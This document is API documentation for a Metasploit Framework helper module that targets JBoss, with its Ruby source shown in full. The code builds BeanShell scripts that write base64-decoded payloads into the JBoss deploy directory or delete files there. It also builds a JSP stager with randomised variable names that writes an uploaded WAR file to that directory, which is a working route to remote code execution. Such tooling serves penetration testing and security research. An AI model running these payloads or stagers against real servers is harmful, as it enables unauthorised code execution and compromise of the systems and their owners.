Module: Msf::Exploit::Remote::HTTP::JBoss::BeanShellScripts

Included in:
Msf::Exploit::Remote::HTTP::JBoss
Defined in:
lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb

Instance Method Summary collapse

Instance Method Details

#create_file_bsh(opts = {}) ⇒ String

Generate a Bean Shell script which creates files inside the JBOSS's deploy

directory.

Parameters:

  • opts (Hash) (defaults to: {})

    Hash containing the options to create the Bean Shell Script.

Options Hash (opts):

  • :dir (Symbol)

    The dir where place the file.

  • :file (Symbol)

    The file path.

  • :contents (Symbol)

    The file contents.

Returns:

  • (String)

    A Bean Shell script to create the file.


67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# File 'lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb', line 67

def create_file_bsh(opts = {})
  dir = opts[:dir]
  file = opts[:file]
  contents = opts[:contents]

  payload_bsh_script = <<-EOT
import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;

String val = "#{contents}";

BASE64Decoder decoder = new BASE64Decoder();
String jboss_home = System.getProperty("jboss.server.home.dir");
new File(jboss_home + "/deploy/#{dir}").mkdir();
byte[] byteval = decoder.decodeBuffer(val);
String location = jboss_home + "/deploy/#{file}";
FileOutputStream fstream = new FileOutputStream(location);
fstream.write(byteval);
fstream.close();
  EOT

  payload_bsh_script
end

#delete_files_bsh(opts = {}) ⇒ String

Generate a Bean Shell script to delete files from the JBoss's /deploy

directory.

Parameters:

  • opts (Hash) (defaults to: {})

    Hash containing the files to delete, the values are the files paths.

Returns:

  • (String)

    A Bean Shell script to delete files.


97
98
99
100
101
102
103
104
# File 'lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb', line 97

def delete_files_bsh(opts = {})
  script = "String jboss_home = System.getProperty(\"jboss.server.home.dir\");\n"
  opts.values.each do |v|
    script << "new File(jboss_home + \"/deploy/#{v}\").delete();\n"
  end

  script
end

#generate_bsh(type, opts = {}) ⇒ String

Generates a Bean Shell Script.

Parameters:

  • type (Symbol)

    The Bean Shell script type, `:create` or `:delete`.

  • opts (Hash) (defaults to: {})

    Hash of configuration options.

Returns:

  • (String)

    A Bean Shell script.


10
11
12
13
14
15
16
17
18
19
20
# File 'lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb', line 10

def generate_bsh(type, opts ={})
  bean_shell = nil
  case type
  when :create
    bean_shell = create_file_bsh(opts)
  when :delete
    bean_shell = delete_files_bsh(opts)
  end

  bean_shell
end

#stager_jsp(app_base) ⇒ String

Generate a stager JSP to write a WAR file to the deploy/ directory. This is used to bypass the size limit for GET/HEAD requests.

Parameters:

  • app_base (String)

    The name of the WAR app to write.

Returns:

  • (String)

    The JSP stager.


27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
# File 'lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb', line 27

def stager_jsp(app_base)
  decoded_var = Rex::Text.rand_text_alpha(8+rand(8))
  file_path_var = Rex::Text.rand_text_alpha(8+rand(8))
  jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
  fos_var = Rex::Text.rand_text_alpha(8+rand(8))
  content_var = Rex::Text.rand_text_alpha(8+rand(8))

  stager_jsp = <<-EOT
<%@page import="java.io.*,
  java.util.*,
  sun.misc.BASE64Decoder"
%>
<%
String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
String #{file_path_var} = #{jboss_home_var} + "/deploy/" + "#{app_base}.war";
try {
  String #{content_var} = "";
  String parameterName = (String)(request.getParameterNames().nextElement());
  #{content_var} = request.getParameter(parameterName);
  FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
  byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
  #{fos_var}.write(#{decoded_var});
  #{fos_var}.close();
}
catch(Exception e){ }
%>
  EOT

  stager_jsp
end